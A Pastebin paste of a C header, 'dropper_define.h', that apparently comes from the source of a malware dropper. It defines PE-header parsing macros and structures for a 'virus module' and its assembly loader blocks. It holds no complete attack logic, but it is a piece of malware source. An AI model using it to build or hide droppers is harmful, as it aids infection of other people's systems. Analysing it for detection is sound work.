Advertisement
FlyFar

dropper_define.h

Feb 19th, 2023
452
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.03 KB | Cybersecurity | 0 0
  1. #ifndef DEFINE_H
  2. #define DEFINE_H
  3.  
  4. #include "StdAfx.h"
  5.  
  6. #define IMAGE_NT(h)             (PIMAGE_NT_HEADERS)(((PIMAGE_DOS_HEADER)h)->e_lfanew + (DWORD)h)
  7. #define SECTION_TABLE(h)        (PIMAGE_SECTION_HEADER)((DWORD)h + h->FileHeader.SizeOfOptionalHeader + sizeof(IMAGE_FILE_HEADER) + sizeof(DWORD))
  8.  
  9. #define HAS_FAILED(v, r) { if(v) return (r); }
  10. #define _SIZE(x, y) (DWORD)((DWORD)x - (DWORD)y)
  11.  
  12. // Return Global Encoded Function Pointer
  13. #define _F(s) g_hardAddrs.##s
  14.  
  15. #define MZ_HEADER 0x5A4D
  16. #define PE_HEADER 0x4550
  17.  
  18. typedef void (*__tLibraryExecEntry)(LPVOID, INT32);
  19. typedef NTSTATUS (*__tAlignAddresses)(PIMAGE_DOS_HEADER *);
  20.  
  21. typedef struct _GENERAL_INFO_BLOCK {
  22.     DWORD  OriginalAddress;
  23.     DWORD UnknownZero0;
  24.     HANDLE MappedAddress;
  25.     DWORD  AlignAddressesFunction;
  26.     WCHAR  RandomLibraryName[32];
  27.     DWORD AbsoluteEntryPoint;
  28.     DWORD UnknownZero1;
  29.     DWORD SizeOfStackReserve;
  30.     DWORD SizeOfStackCommit;
  31.     DWORD Subsystem;
  32.     WORD MinorSubsystemVersion;
  33.     WORD MajorSubsystemVersion;
  34.     DWORD UnknownZero2;
  35.     WORD Charactersitics;
  36.     WORD DllCharacteristics;
  37.     WORD Machine;
  38.     BYTE  UnknownOne;
  39.     BYTE  UnknownFour;
  40.     DWORD LoaderFlags;
  41.     DWORD VirusModuleSize;
  42.     DWORD UnknownZero3;
  43. } GENERAL_INFO_BLOCK, *PGENERAL_INFO_BLOCK;
  44.  
  45. typedef struct _SECTION_SEGEMENT_INFO {
  46.     DWORD SegmentAddress;
  47.     DWORD SegmentSize;
  48. } SECTION_SEGEMENT_INFO, *PSECTION_SEGEMENT_INFO;
  49.  
  50. typedef struct _VIRUS_MODULE_BLOCKS_HEADER {
  51.     GENERAL_INFO_BLOCK    InformationBlock;
  52.     HMODULE               VirusModulePointer;
  53.     SECTION_SEGEMENT_INFO UnknownSegment;
  54.     SECTION_SEGEMENT_INFO VirusModuleSegment;
  55.     INT32                 LibraryExecuteEntryNumber;
  56. } VIRUS_MODULE_BLOCKS_HEADER, *PVIRUS_MODULE_BLOCKS_HEADER;
  57.  
  58. typedef struct _ASM_CODE_BLOCKS_HEADER {
  59.     DWORD                 ExecuteLibrary;
  60.     DWORD                 AlignAddresses;
  61.     SECTION_SEGEMENT_INFO ASMBlock1Segment;
  62.     SECTION_SEGEMENT_INFO CodeBlockSegment;
  63.     SECTION_SEGEMENT_INFO ASMBlock0Segment;
  64.     DWORD                 VirusModuleSection;
  65. } ASM_CODE_BLOCKS_HEADER, *PASM_CODE_BLOCKS_HEADER;
  66.  
  67. #endif // DEFINE_H
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement